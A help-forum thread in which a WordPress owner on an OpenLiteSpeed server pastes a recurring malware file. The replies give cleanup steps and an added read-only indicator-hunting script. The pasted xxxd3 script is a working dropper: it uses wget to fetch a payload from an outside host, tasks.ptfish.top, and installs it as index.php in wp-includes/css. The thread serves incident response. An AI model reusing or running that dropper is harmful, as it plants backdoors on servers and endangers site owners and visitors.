Openlitespeed droplet /var/www/xxxd3 virus file

Posted on October 12, 2021

Hello, I am using openlitespeed droplet and my wordpress website is infected. I delete virus files but they come back again. I also noticed the /var/www/xxxd3 file but even though I deleted it, it comes back again. How can I clean the server and ensure security? I am sharing the contents of the xxxd3 file below.

Please help!

#!/bin/bash
root_dir=$1

if [ ! -d ${root_dir}/wp-includes/css ];
        then
        mkdir -p ${root_dir}/wp-includes/css;
fi

cd ${root_dir}/wp-includes/css;
rm -f wp-sign.txt;wget -q -O wp-sign.txt http://tasks.ptfish.top/wp-sign.txt && mv wp-sign.txt index.php;


  1. Check if there’s any cronjob that is not set by you.
  2. Scan your site with some security plugin

There are also some useful tutorials on Google search that you can follow, e.g. https://askwpgirl.com/10-steps-remove-malware-wordpress-site/

It looks like your WordPress installation is infected with malware that keeps reappearing, likely due to a backdoor script or vulnerability that hasn’t been fully addressed. Here’s a step-by-step guide to cleaning your server and securing it:

  1. Scan for Malware

Use a malware scanning tool such as ClamAV or a WordPress-specific tool like Wordfence:

  • Install ClamAV on your server:
sudo apt-get install clamav clamav-daemon
sudo freshclam
sudo clamscan -r /var/www
  • Use Wordfence or other WordPress plugins to scan the WordPress installation.
  2. Remove Suspicious Files

After scanning, manually delete any files flagged as suspicious. Specifically, ensure you remove hidden scripts like xxxd3 and any other backdoor scripts in your WordPress folders.

  3. Check Crontab for Malicious Entries

Malware may be using cron jobs to reinfect your system. List the cron jobs:

crontab -l
sudo crontab -l

If you find any unfamiliar or suspicious entries, remove them using:

crontab -e

  4. Harden WordPress
  • Reinstall Core Files: Replace core WordPress files with fresh ones from the official repository.
  • Update Plugins/Themes: Ensure all plugins, themes, and WordPress itself are up-to-date.
  • Delete Unused Plugins: Remove any unused or outdated plugins and themes that may have vulnerabilities.
  5. Check File Permissions

Set proper permissions for your WordPress files and directories to prevent unauthorized writing:

sudo find /var/www -type d -exec chmod 755 {} \; 
sudo find /var/www -type f -exec chmod 644 {} \;
  6. Secure Your OpenLiteSpeed Server
  • Enable ModSecurity (Web Application Firewall) to block malicious requests.
  • Change SSH Port: If you’re using SSH, change the port to something non-standard to reduce the chance of brute-force attacks.
  • Limit File Uploads: If possible, restrict write access only to necessary folders (like wp-content/uploads).
  7. Change All Passwords

Change your WordPress admin, database, and SSH passwords. Ensure you’re using strong, unique passwords.

  8. Monitor for Future Changes

Use tools like Tripwire or other file integrity monitoring tools to get alerts when unauthorized changes happen.

Once you’ve cleaned the site, I recommend setting up automated backups and using security plugins to actively protect your site going forward.

You can also check this question here:

https://www.digitalocean.com/community/questions/how-to-secure-wordpress-without-a-security-plugin

Regards
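
An added example, not part of either answer above: the xxxd3 script takes a site root as its argument, so something else on the server keeps re-creating and calling it. This read-only sketch searches for that caller and for the file the dropper writes, using only the indicators visible in the quoted script. The function names, the `hunt.sh` file name and the Debian/Ubuntu directory list are assumptions.

```shell
#!/bin/sh
# Added example (not from the thread). Indicators are taken from the xxxd3
# script quoted in the question: its file name, the payload name it downloads
# and the host it downloads from.
IOC_REGEX='xxxd3|wp-sign\.txt|tasks\.ptfish\.top'

# Assumed Debian/Ubuntu locations where a scheduled or boot-time re-dropper
# can live. /var/spool/cron holds every user's crontab, including the
# web-server user's, which "crontab -l" as yourself or as root does not show.
PERSIST_DIRS='/var/spool/cron /etc/crontab /etc/cron.d /etc/cron.hourly /etc/cron.daily /etc/systemd/system /etc/rc.local'

# find_persistence PATH...
# Print the files under the given paths that mention any indicator.
find_persistence() {
    grep -rlIE "$IOC_REGEX" "$@" 2>/dev/null | sort
}

# find_dropped_payloads WEBROOT
# The dropper renames its download to <site>/wp-includes/css/index.php,
# so list every file at that path under WEBROOT.
find_dropped_payloads() {
    find "$1" -type f -path '*/wp-includes/css/index.php' 2>/dev/null | sort
}

# hunt [WEBROOT]: read-only report; nothing is deleted.
hunt() {
    webroot=${1:-/var/www}
    echo "== Files referencing the dropper (remove the caller before the script) =="
    # PERSIST_DIRS is left unquoted on purpose: it is a space-separated list.
    find_persistence $PERSIST_DIRS "$webroot"
    echo "== Files at the path the dropper writes to =="
    find_dropped_payloads "$webroot"
}

# Run the report only when asked to, e.g.: sudo sh hunt.sh --hunt /var/www
if [ "${1:-}" = "--hunt" ]; then
    hunt "${2:-/var/www}"
fi
```

Any file the first section lists outside the web root is the likely reason deleted files return; a hit inside the web root other than xxxd3 itself points to a PHP backdoor that rewrites it.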
